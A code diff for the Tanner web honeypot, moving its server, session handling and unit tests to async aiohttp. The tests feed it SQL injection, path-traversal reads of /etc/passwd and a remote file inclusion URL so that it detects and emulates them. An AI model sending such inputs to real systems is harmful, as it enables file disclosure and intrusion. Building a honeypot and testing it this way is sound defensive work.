-LOGGER = logging.getLogger(__name__)
-
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
-class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
- redis_client = None
- session_manager = session_manager.SessionManager()
- dorks = dorks_manager.DorksManager()
+class TannerServer:
+ def __init__(self):
+ base_dir = TannerConfig.get('EMULATORS', 'root_dir')
+ db_name = TannerConfig.get('SQLI', 'db_name')
- def __init__(self, *args, **kwargs):
- super(HttpRequestHandler, self).__init__()
+ self.session_manager = session_manager.SessionManager()
+ self.dorks = dorks_manager.DorksManager()
self.api = api.Api()
- self.base_handler = base.BaseHandler(kwargs['base_dir'], kwargs['db_name'])
- self.logger = logging.getLogger(__name__ + '.' + self.__class__.__name__)
+ self.base_handler = base.BaseHandler(base_dir, db_name)
+ self.logger = logging.getLogger(__name__)
+ self.redis_client = None
@staticmethod
def _make_response(msg):
- response_message = json.dumps(dict(
+ response_message = dict(
version=1,
response=dict(message=msg)
- )).encode('utf-8')
+ )
return response_message
- @asyncio.coroutine
- def handle_event(self, data, redis_client):
+ @staticmethod
+ async def default_handler(request):
+ return web.Response(text="Tanner server")
+
+ async def handle_event(self, request):
+ data = await request.read()
try:
data = json.loads(data.decode('utf-8'))
- path = unquote(data['path'])
+ path = yarl.unquote(data['path'])
except (TypeError, ValueError, KeyError) as error:
self.logger.error('error parsing request: %s', data)
response_msg = self._make_response(msg=type(error).__name__)
else:
- session = yield from HttpRequestHandler.session_manager.add_or_update_session(
+ session = await self.session_manager.add_or_update_session(
data, self.redis_client
)
self.logger.info('Requested path %s', path)
- yield from self.dorks.extract_path(path, redis_client)
- detection = yield from self.base_handler.handle(data, session, path)
- session.set_attack_type(path, detection['name'])
+ await self.dorks.extract_path(path, self.redis_client)
+ detection = await self.base_handler.handle(data, session, path)
+ session.set_attack_type(path, detection["name"])
+
response_msg = self._make_response(msg=dict(detection=detection, sess_uuid=session.get_uuid()))
self.logger.info('TANNER response %s', response_msg)
session_data = data
- session_data['response_msg'] = json.loads(response_msg.decode('utf-8'))
+ session_data['response_msg'] = response_msg
# Log to Mongo
- if config.TannerConfig.get('MONGO', 'enabled') == 'True':
+ if TannerConfig.get('MONGO', 'enabled') == 'True':
db = mongo_report()
session_id = db.create_session(session_data)
self.logger.info("Writing session to DB: {}".format(session_id))
- if config.TannerConfig.get('LOCALLOG', 'enabled') == 'True':
+ if TannerConfig.get('LOCALLOG', 'enabled') == 'True':
lr = local_report()
lr.create_session(session_data)
+ return web.json_response(response_msg)
- return response_msg
-
- @asyncio.coroutine
- def handle_request(self, message, payload):
- response = aiohttp.Response(
- self.writer, 200, http_version=message.version
- )
- if message.path == '/dorks':
- dorks = yield from self.dorks.choose_dorks(self.redis_client)
- response_msg = json.dumps(
- dict(version=1, response=dict(dorks=dorks)),
- sort_keys=True, indent=2
- ).encode('utf-8')
- elif message.path == '/event':
- data = yield from payload.read()
- response_msg = yield from self.handle_event(data, self.redis_client)
- elif message.path.startswith('/api'):
- data = yield from self.api.handle_api_request(message.path, self.redis_client)
- response_msg = self._make_response(data)
+ async def handle_api(self, request):
+ api_query = request.match_info.get("api_query")
+ if api_query is None:
+ data = "tanner api"
else:
- response_msg = self._make_response(msg='')
-
- response.add_header('Content-Type', 'application/json')
- response.add_header('Content-Length', str(len(response_msg)))
- response.send_headers()
- response.write(response_msg)
- yield from response.write_eof()
-
-
-@asyncio.coroutine
-def get_redis_client():
- try:
- host = config.TannerConfig.get('REDIS', 'host')
- port = config.TannerConfig.get('REDIS', 'port')
- poolsize = config.TannerConfig.get('REDIS', 'poolsize')
- timeout = config.TannerConfig.get('REDIS', 'timeout')
- redis_client = yield from asyncio.wait_for(asyncio_redis.Pool.create(
- host=host, port=int(port), poolsize=int(poolsize)), timeout=int(timeout))
- except asyncio.TimeoutError as timeout_error:
- LOGGER.error('Problem with redis connection. Please, check your redis server. %s', timeout_error)
- exit()
- else:
- HttpRequestHandler.redis_client = redis_client
-
-
-def run_server():
- loop = asyncio.get_event_loop()
- srv = None
- try:
- if HttpRequestHandler.redis_client is None:
- loop.run_until_complete(get_redis_client())
- f = loop.create_server(
- lambda: HttpRequestHandler(debug=False, keep_alive=75,
- base_dir=config.TannerConfig.get('EMULATORS', 'root_dir'),
- db_name=config.TannerConfig.get('SQLI', 'db_name')),
- config.TannerConfig.get('TANNER', 'host'), int(config.TannerConfig.get('TANNER', 'port')))
- srv = loop.run_until_complete(f)
- LOGGER.info('serving on %s', srv.sockets[0].getsockname())
- loop.run_forever()
- except KeyboardInterrupt:
- pass
- finally:
- if HttpRequestHandler.redis_client is not None:
- HttpRequestHandler.redis_client.close()
- if srv:
- srv.close()
- loop.run_until_complete(srv.wait_closed())
- loop.close()
+ data = await self.api.handle_api_request(api_query, request.url.query, self.redis_client)
+ response_msg = self._make_response(data)
+ return web.json_response(response_msg)
+
+ async def handle_dorks(self, request):
+ dorks = await self.dorks.choose_dorks(self.redis_client)
+ response_msg = dict(version=1, response=dict(dorks=dorks))
+ return web.json_response(response_msg)
+
+ def setup_routes(self, app):
+ app.router.add_route('*', '/', self.default_handler)
+ app.router.add_post('/event', self.handle_event)
+ app.router.add_get('/api', self.handle_api)
+ app.router.add_get('/api/{api_query}', self.handle_api)
+ app.router.add_get('/dorks', self.handle_dorks)
+
+ def create_app(self, loop):
+ app = web.Application(loop=loop)
+ self.setup_routes(app)
+ return app
+
+ def start(self):
+ loop = asyncio.get_event_loop()
+ tanner_app = self.create_app(loop)
+ self.redis_client = loop.run_until_complete(redis_client.RedisClient.get_redis_client())
+ host = TannerConfig.get('TANNER', 'host')
+ port = TannerConfig.get('TANNER', 'port')
+ web.run_app(tanner_app, host=host, port=port)
diff --git a/tanner/session.py b/tanner/session.py
index 356f8c1c..0f144605 100644
--- a/tanner/session.py
+++ b/tanner/session.py
@@ -1,8 +1,13 @@
+import asyncio
import json
import time
-import os
+import asyncio
import uuid
+from tanner.config import TannerConfig
+from tanner.emulators import cmd_exec
+from tanner.utils.mysql_db_helper import MySQLDBHelper
+from tanner.utils.sqlite_db_helper import SQLITEDBHelper
class Session:
KEEP_ALIVE_TIME = 75
@@ -17,6 +22,7 @@ def __init__(self, data):
'response_status': data['status']}]
self.cookies = data['cookies']
self.associated_db = None
+ self.associated_env = None
except KeyError:
raise
@@ -59,9 +65,17 @@ def set_attack_type(self, path, attack_type):
def associate_db(self, db_name):
self.associated_db = db_name
- def remove_associated_db(self):
- if self.associated_db is not None and os.path.exists(self.associated_db):
- os.remove(self.associated_db)
+ async def remove_associated_db(self):
+ if(TannerConfig.get('SQLI', 'type') == 'MySQL'):
+ await MySQLDBHelper().delete_db(self.associated_db)
+ else:
+ SQLITEDBHelper().delete_db(self.associated_db)
+
+ def associate_env(self, env):
+ self.associated_env = env
+
+ async def remove_associated_env(self):
+ await cmd_exec.CmdExecEmulator().delete_env(self.associated_env)
def get_uuid(self):
return str(self.sess_uuid)
diff --git a/tanner/session_analyzer.py b/tanner/session_analyzer.py
index dabf031d..3a807fe5 100644
--- a/tanner/session_analyzer.py
+++ b/tanner/session_analyzer.py
@@ -10,43 +10,41 @@
class SessionAnalyzer:
- def __init__(self):
- self.queue = asyncio.Queue()
+ def __init__(self, loop=None):
+ self._loop = loop if loop is not None else asyncio.get_event_loop()
+ self.queue = asyncio.Queue(loop=self._loop)
self.logger = logging.getLogger('tanner.session_analyzer.SessionAnalyzer')
- @asyncio.coroutine
- def analyze(self, session_key, redis_client):
+ async def analyze(self, session_key, redis_client):
session = None
- yield from asyncio.sleep(1)
+ await asyncio.sleep(1, loop=self._loop)
try:
- session = yield from redis_client.get(session_key)
+ session = await redis_client.get(session_key)
session = json.loads(session)
except (asyncio_redis.NotConnectedError, TypeError, ValueError) as error:
self.logger.error('Can\'t get session for analyze: %s', error)
else:
- result = yield from self.create_stats(session, redis_client)
- yield from self.queue.put(result)
- yield from self.save_session(redis_client)
+ result = await self.create_stats(session, redis_client)
+ await self.queue.put(result)
+ await self.save_session(redis_client)
- @asyncio.coroutine
- def save_session(self, redis_client):
+ async def save_session(self, redis_client):
while not self.queue.empty():
- session = yield from self.queue.get()
+ session = await self.queue.get()
s_key = session['sensor_uuid']
del_key = session['sess_uuid']
try:
- yield from redis_client.lpush(s_key, [json.dumps(session)])
- yield from redis_client.delete([del_key])
+ await redis_client.lpush(s_key, [json.dumps(session)])
+ await redis_client.delete([del_key])
except asyncio_redis.NotConnectedError as redis_error:
self.logger.error('Error with redis. Session will be returned to the queue: %s',
redis_error)
self.queue.put(session)
- @asyncio.coroutine
- def create_stats(self, session, redis_client):
+ async def create_stats(self, session, redis_client):
sess_duration = session['end_time'] - session['start_time']
rps = sess_duration / session['count']
- tbr, errors, hidden_links, attack_types = yield from self.analyze_paths(session['paths'],
+ tbr, errors, hidden_links, attack_types = await self.analyze_paths(session['paths'],
redis_client)
stats = dict(
@@ -72,12 +70,11 @@ def create_stats(self, session, redis_client):
return stats
@staticmethod
- @asyncio.coroutine
- def analyze_paths(paths, redis_client):
+ async def analyze_paths(paths, redis_client):
tbr = []
attack_types = []
current_path = paths[0]
- dorks = yield from redis_client.smembers_asset(DorksManager.dorks_key)
+ dorks = await redis_client.smembers_asset(DorksManager.dorks_key)
for i, path in enumerate(paths, start=1):
tbr.append(path['timestamp'] - current_path['timestamp'])
diff --git a/tanner/session_manager.py b/tanner/session_manager.py
index 81e3e9c0..ad7aac73 100644
--- a/tanner/session_manager.py
+++ b/tanner/session_manager.py
@@ -8,19 +8,18 @@
class SessionManager:
- def __init__(self):
+ def __init__(self, loop=None):
self.sessions = []
- self.analyzer = SessionAnalyzer()
- self.logger = logging.getLogger('tanner.session_manager.SessionManager')
+ self.analyzer = SessionAnalyzer(loop=loop)
+ self.logger = logging.getLogger(__name__)
- @asyncio.coroutine
- def add_or_update_session(self, raw_data, redis_client):
+ async def add_or_update_session(self, raw_data, redis_client):
# prepare the list of sessions
- yield from self.delete_old_sessions(redis_client)
+ await self.delete_old_sessions(redis_client)
# handle raw data
valid_data = self.validate_data(raw_data)
# push snare uuid into redis.
- yield from redis_client.sadd('snare_ids', [valid_data['uuid']])
+ await redis_client.sadd('snare_ids', [valid_data['uuid']])
session = self.get_session(valid_data)
if session is None:
try:
@@ -67,16 +66,17 @@ def get_session(self, data):
break
return session
- @asyncio.coroutine
- def delete_old_sessions(self, redis_client):
+ async def delete_old_sessions(self, redis_client):
for sess in self.sessions:
if not sess.is_expired():
continue
+ await sess.remove_associated_db()
sess.remove_associated_db()
+ await sess.remove_associated_env()
self.sessions.remove(sess)
try:
- yield from redis_client.set(sess.get_uuid(), sess.to_json())
- yield from self.analyzer.analyze(sess.get_uuid(), redis_client)
+ await redis_client.set(sess.get_uuid(), sess.to_json())
+ await self.analyzer.analyze(sess.get_uuid(), redis_client)
except asyncio_redis.NotConnectedError as redis_error:
self.logger.error('Error connect to redis, session stay in memory. %s', redis_error)
self.sessions.append(sess)
diff --git a/tanner/tests/test_base.py b/tanner/tests/test_base.py
index 1ebda165..88845c19 100644
--- a/tanner/tests/test_base.py
+++ b/tanner/tests/test_base.py
@@ -1,127 +1,114 @@
import asyncio
import unittest
-from tanner.emulators import base
from unittest import mock
-class TestBase(unittest.TestCase):
- def setUp(self):
- self.session = mock.Mock()
- self.session.associate_db = mock.Mock()
- self.data = mock.Mock()
- with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
- self.handler = base.BaseHandler('/tmp/', 'test.db')
+from tanner.emulators import base
- def test_handle_get_sqli(self):
- path = '/index.html?id=1 UNION SELECT 1'
- @asyncio.coroutine
- def mock_sqli_check_get_data(path):
- return 1;
+class TestBase(unittest.TestCase):
+ def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.session = mock.Mock()
+ self.session.associate_db = mock.Mock()
+ self.data = mock.Mock()
+ with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
+ self.handler = base.BaseHandler('/tmp/', 'test.db', self.loop)
- @asyncio.coroutine
- def mock_sqli_handle(path, session, post_request=0):
- return 'sqli_test_payload'
+ def test_handle_get_sqli(self):
+ path = '/index.html?id=1 UNION SELECT 1'
- self.handler.emulators['sqli'] = mock.Mock()
- self.handler.emulators['sqli'].check_get_data = mock_sqli_check_get_data
- self.handler.emulators['sqli'].handle = mock_sqli_handle
+ async def mock_sqli_check_get_data(path):
+ return 1
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ async def mock_sqli_handle(path, session, post_request=0):
+ return 'sqli_test_payload'
- assert_detection = {'name': 'sqli', 'order': 2, 'payload': 'sqli_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ self.handler.emulators['sqli'] = mock.Mock()
+ self.handler.emulators['sqli'].check_get_data = mock_sqli_check_get_data
+ self.handler.emulators['sqli'].handle = mock_sqli_handle
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_xss(self):
- path = '/index.html?id='
+ assert_detection = {'name': 'sqli', 'order': 2, 'payload': 'sqli_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_xss_handle(path, session, post_request=0):
- return 'xss_test_payload'
+ def test_handle_get_xss(self):
+ path = '/index.html?id='
- self.handler.emulators['xss'] = mock.Mock()
- self.handler.emulators['xss'].handle = mock_xss_handle
+ async def mock_xss_handle(path, session, post_request=0):
+ return 'xss_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['xss'] = mock.Mock()
+ self.handler.emulators['xss'].handle = mock_xss_handle
- assert_detection = {'name': 'xss', 'order': 3, 'payload': 'xss_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_lfi(self):
- path = '/index.html?file=/etc/passwd'
+ assert_detection = {'name': 'xss', 'order': 3, 'payload': 'xss_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_lfi_handle(path, session, post_request=0):
- return 'lfi_test_payload'
+ def test_handle_get_lfi(self):
+ path = '/index.html?file=/etc/passwd'
- self.handler.emulators['lfi'] = mock.Mock()
- self.handler.emulators['lfi'].handle = mock_lfi_handle
+ async def mock_lfi_handle(path, session, post_request=0):
+ return 'lfi_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['lfi'] = mock.Mock()
+ self.handler.emulators['lfi'].handle = mock_lfi_handle
- assert_detection = {'name': 'lfi', 'order': 2, 'payload': 'lfi_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_index(self):
- path = '/index.html'
+ assert_detection = {'name': 'lfi', 'order': 2, 'payload': 'lfi_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ def test_handle_get_index(self):
+ path = '/index.html'
- assert_detection = detection = {'name': 'index', 'order': 1}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_lfi(self):
- path = '/wp-content'
+ assert_detection = detection = {'name': 'index', 'order': 1}
+ self.assertDictEqual(detection, assert_detection)
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ def test_handle_get_wp_content(self):
+ path = '/wp-content'
- assert_detection = detection = {'name': 'wp-content', 'order': 1}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_rfi(self):
- path = '/index.html?file=http://attack.php'
+ assert_detection = detection = {'name': 'wp-content', 'order': 1}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_rfi_handle(path, session, post_request=0):
- return 'rfi_test_payload'
+ def test_handle_get_rfi(self):
+ path = '/index.html?file=http://attack.php'
- self.handler.emulators['rfi'] = mock.Mock()
- self.handler.emulators['rfi'].handle = mock_rfi_handle
+ async def mock_rfi_handle(path, session, post_request=0):
+ return 'rfi_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['rfi'] = mock.Mock()
+ self.handler.emulators['rfi'].handle = mock_rfi_handle
- assert_detection = {'name': 'rfi', 'order': 2, 'payload': 'rfi_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_post_xss(self):
+ assert_detection = {'name': 'rfi', 'order': 2, 'payload': 'rfi_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_xss_handle(value, session, raw_data=None):
- return 'xss_test_payload'
+ def test_handle_post_xss(self):
+ async def mock_xss_handle(value, session, raw_data=None):
+ return 'xss_test_payload'
- self.handler.emulators['xss'] = mock.Mock()
- self.handler.emulators['xss'].handle = mock_xss_handle
+ self.handler.emulators['xss'] = mock.Mock()
+ self.handler.emulators['xss'].handle = mock_xss_handle
- @asyncio.coroutine
- def mock_sqli_check_post_data(data):
- return 1;
+ async def mock_sqli_check_post_data(data):
+ return 1
- @asyncio.coroutine
- def mock_sqli_handle(path, session, post_request=0):
- return None
+ async def mock_sqli_handle(path, session, post_request=0):
+ return None
- self.handler.emulators['sqli'] = mock.Mock()
- self.handler.emulators['sqli'].check_post_data = mock_sqli_check_post_data
- self.handler.emulators['sqli'].handle = mock_sqli_handle
+ self.handler.emulators['sqli'] = mock.Mock()
+ self.handler.emulators['sqli'].check_post_data = mock_sqli_check_post_data
+ self.handler.emulators['sqli'].handle = mock_sqli_handle
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_post(self.session, self.data))
+ detection = self.loop.run_until_complete(self.handler.handle_post(self.session, self.data))
- assert_detection = {'name': 'xss', 'order': 2, 'payload': 'xss_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ assert_detection = {'name': 'xss', 'order': 2, 'payload': 'xss_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
diff --git a/tanner/tests/test_config.py b/tanner/tests/test_config.py
index 94d2e1dd..020fac11 100644
--- a/tanner/tests/test_config.py
+++ b/tanner/tests/test_config.py
@@ -1,70 +1,72 @@
-import unittest
import configparser
import os
+import unittest
+
from tanner import config
class TestCongif(unittest.TestCase):
- def setUp(self):
- config.TannerConfig.config = None
- self.d = {'DATA': {'db_config': '/tmp/user_tanner/db/db_config.json', 'dorks': '/tmp/user_tanner/data/dorks.pickle',
- 'user_dorks': '/tmp/user_tanner/data/user_dorks.pickle',
- 'vdocs': '/tmp/user_tanner/data/vdocs.json'},
- 'TANNER': {'host': '0.0.0.0', 'port': '9000'},
- 'REDIS': {'host': 'localhost', 'port': '1337', 'poolsize': '40', 'timeout': '5'},
- 'EMULATORS': {'root_dir': '/tmp/user_tanner'},
- 'SQLI': {'db_name': 'user_tanner.db'},
- 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
- 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
- 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/user_tanner_report.json'}
- }
-
- self.valid_config_path = '/tmp/tanner_config'
- self.cfg = configparser.ConfigParser()
- if not os.path.exists(self.valid_config_path):
- for section in self.d:
- self.cfg.add_section(section)
- for value, data in self.d[section].items():
- self.cfg.set(section, value, data)
- f = open(self.valid_config_path, 'w')
- self.cfg.write(f)
- else:
- self.cfg.read(self.valid_config_path)
-
- self.invalid_config_path = '/random/random_name'
+ def setUp(self):
+ config.TannerConfig.config = None
+ self.d = {
+ 'DATA': {'db_config': '/tmp/user_tanner/db/db_config.json', 'dorks': '/tmp/user_tanner/data/dorks.pickle',
+ 'user_dorks': '/tmp/user_tanner/data/user_dorks.pickle',
+ 'vdocs': '/tmp/user_tanner/data/vdocs.json'},
+ 'TANNER': {'host': '0.0.0.0', 'port': '9000'},
+ 'REDIS': {'host': 'localhost', 'port': '1337', 'poolsize': '40', 'timeout': '5'},
+ 'EMULATORS': {'root_dir': '/tmp/user_tanner'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'user_tanner_db', 'host':'localhost', 'user':'user_name', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'test_image'},
+ 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
+ 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
+ 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/user_tanner_report.json'}
+ }
- def test_set_config_when_file_exists(self):
- config.TannerConfig.set_config(self.valid_config_path)
- self.assertIsNotNone(config.TannerConfig.config)
+ self.valid_config_path = '/tmp/tanner_config'
+ self.cfg = configparser.ConfigParser()
+ if not os.path.exists(self.valid_config_path):
+ for section in self.d:
+ self.cfg.add_section(section)
+ for value, data in self.d[section].items():
+ self.cfg.set(section, value, data)
+ f = open(self.valid_config_path, 'w')
+ self.cfg.write(f)
+ else:
+ self.cfg.read(self.valid_config_path)
- def test_set_config_when_file_dont_exists(self):
- with self.assertRaises(SystemExit):
- config.TannerConfig.set_config(self.invalid_config_path)
- self.assertIsNone(config.TannerConfig.config)
+ self.invalid_config_path = '/random/random_name'
- def test_get_when_file_exists(self):
- config.TannerConfig.config = self.cfg
- for section in self.d:
- for value, assertion_data in self.d[section].items():
- data = config.TannerConfig.get(section, value)
- self.assertEqual(data, assertion_data)
+ def test_set_config_when_file_exists(self):
+ config.TannerConfig.set_config(self.valid_config_path)
+ self.assertIsNotNone(config.TannerConfig.config)
- def test_get_when_file_dont_exists(self):
- config_template = {'DATA': {'db_config': '/opt/tanner/db/db_config.json', 'dorks': '/opt/tanner/data/dorks.pickle',
- 'user_dorks': '/opt/tanner/data/user_dorks.pickle',
- 'vdocs': '/opt/tanner/data/vdocs.json'},
- 'TANNER': {'host': '0.0.0.0', 'port': 8090},
- 'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
- 'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
- 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
- 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
- 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
- }
+ def test_set_config_when_file_dont_exists(self):
+ with self.assertRaises(SystemExit):
+ config.TannerConfig.set_config(self.invalid_config_path)
+ self.assertIsNone(config.TannerConfig.config)
- for section in config_template:
- for value, assertion_data in config_template[section].items():
- data = config.TannerConfig.get(section, value)
- self.assertEqual(data, assertion_data)
+ def test_get_when_file_exists(self):
+ config.TannerConfig.config = self.cfg
+ for section in self.d:
+ for value, assertion_data in self.d[section].items():
+ data = config.TannerConfig.get(section, value)
+ self.assertEqual(data, assertion_data)
+ def test_get_when_file_dont_exists(self):
+ config_template = {
+ 'DATA': {'db_config': '/opt/tanner/db/db_config.json', 'dorks': '/opt/tanner/data/dorks.pickle',
+ 'user_dorks': '/opt/tanner/data/user_dorks.pickle',
+ 'vdocs': '/opt/tanner/data/vdocs.json'},
+ 'TANNER': {'host': '0.0.0.0', 'port': 8090},
+ 'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
+ 'EMULATORS': {'root_dir': '/opt/tanner'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
+ 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
+ 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
+ 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
+ }
-
+ for section in config_template:
+ for value, assertion_data in config_template[section].items():
+ data = config.TannerConfig.get(section, value)
+ self.assertEqual(data, assertion_data)
diff --git a/tanner/tests/test_lfi_emulator.py b/tanner/tests/test_lfi_emulator.py
index 09c71772..45cfab95 100644
--- a/tanner/tests/test_lfi_emulator.py
+++ b/tanner/tests/test_lfi_emulator.py
@@ -1,27 +1,33 @@
+import os
import unittest
from unittest import mock
-import os
-from tanner.emulators import lfi
+import asyncio
from tanner import config
-
+from tanner.emulators import lfi
+import yarl
class TestLfiEmulator(unittest.TestCase):
def setUp(self):
- vdocs = os.path.join(os.getcwd(),'data/vdocs.json')
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ vdocs = os.path.join(os.getcwd(), 'data/vdocs.json')
config.TannerConfig.get = mock.MagicMock(return_value=vdocs)
self.handler = lfi.LfiEmulator('/tmp/')
def test_handle_abspath_lfi(self):
path = '/?foo=/etc/passwd'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIn('root:x:0:0:root:/root:/bin/bash', result)
def test_handle_relative_path_lfi(self):
path = '/?foo=../../../../../etc/passwd'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIn('root:x:0:0:root:/root:/bin/bash', result)
def test_handle_missing_lfi(self):
path = '/?foo=../../../../../etc/bar'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIsNone(result)
diff --git a/tanner/tests/test_rfi_emulation.py b/tanner/tests/test_rfi_emulation.py
index 25df6c06..db43261e 100644
--- a/tanner/tests/test_rfi_emulation.py
+++ b/tanner/tests/test_rfi_emulation.py
@@ -1,41 +1,45 @@
import asyncio
+import ftplib
import unittest
-import aiohttp
-
from tanner.emulators import rfi
class TestRfiEmulator(unittest.TestCase):
def setUp(self):
- self.handler = rfi.RfiEmulator('/tmp/')
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.handler = rfi.RfiEmulator('/tmp/', loop=self.loop)
def test_http_download(self):
path = 'http://example.com'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ data = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNotNone(data)
def test_http_download_fail(self):
path = 'http://foobarfvfd'
- filename = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ filename = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNone(filename)
def test_ftp_download(self):
path = 'ftp://mirror.yandex.ru/archlinux/lastupdate'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ data = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNotNone(data)
def test_ftp_download_fail(self):
path = 'ftp://mirror.yandex.ru/archlinux/foobar'
- with self.assertRaises(aiohttp.errors.ClientOSError):
- yield from self.handler.download_file(path)
+
+ with self.assertLogs():
+ self.loop.run_until_complete(self.handler.download_file(path))
+
def test_get_result_fail(self):
data = "test data"
- with self.assertRaises(aiohttp.errors.ClientOSError):
- yield from self.handler.get_rfi_result(data)
+ result = self.loop.run_until_complete(self.handler.get_rfi_result(data))
+ self.assertIsNone(result)
+
def test_invalid_scheme(self):
path = 'file://mirror.yandex.ru/archlinux/foobar'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
- self.assertIsNone(data)
\ No newline at end of file
+ data = self.loop.run_until_complete(self.handler.download_file(path))
+ self.assertIsNone(data)
diff --git a/tanner/tests/test_server.py b/tanner/tests/test_server.py
index 8c1b8f50..53b32cbe 100644
--- a/tanner/tests/test_server.py
+++ b/tanner/tests/test_server.py
@@ -1,133 +1,109 @@
import asyncio
-import json
-import unittest
-from unittest import mock
import uuid
+from unittest import mock
+
+from aiohttp.test_utils import AioHTTPTestCase, unittest_run_loop
from tanner import server
-from tanner import config
+from tanner.config import TannerConfig
-class TestServer(unittest.TestCase):
+class TestServer(AioHTTPTestCase):
def setUp(self):
d = dict(MONGO={'enabled': 'False', 'URI': 'mongodb://localhost'},
LOCALLOG={'enabled': 'False', 'PATH': '/tmp/tanner_report.json'})
m = mock.MagicMock()
m.__getitem__.side_effect = d.__getitem__
m.__iter__.side_effect = d.__iter__
- config.TannerConfig.config = m
-
- @asyncio.coroutine
- def choosed(client):
- return [x for x in range(10)]
-
- dorks = mock.Mock()
- attrs = {'extract_path.return_value': (lambda: (yield None))()}
- dorks.configure_mock(**attrs)
- dorks.choose_dorks = choosed
+ TannerConfig.config = m
- self.MockedRequestHandler = server.HttpRequestHandler
- self.MockedRequestHandler.redis_client = mock.Mock()
with mock.patch('tanner.dorks_manager.DorksManager', mock.Mock()):
- with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
- self.handler = self.MockedRequestHandler(debug=False, keep_alive=75, base_dir='/tmp/', db_name='test.db')
-
- self.handler.dorks = dorks
- self.handler.writer = mock.Mock()
+ with mock.patch('tanner.emulators.base.BaseHandler', mock.Mock(), create=True):
+ with mock.patch('tanner.session_manager.SessionManager', mock.Mock(), create=True):
+ self.serv = server.TannerServer()
self.test_uuid = uuid.uuid4()
- @asyncio.coroutine
- def add_or_update_mock(data, client):
+
+ async def _add_or_update_mock(data, client):
sess = mock.Mock()
sess.set_attack_type = mock.Mock()
+                # session UUID is pinned to self.test_uuid for assertions below
sess.get_uuid = mock.Mock(return_value=str(self.test_uuid))
return sess
- self.handler.session_manager.add_or_update_session = add_or_update_mock
- # self.handler.dorks = dorks
-
- self.m = mock.Mock()
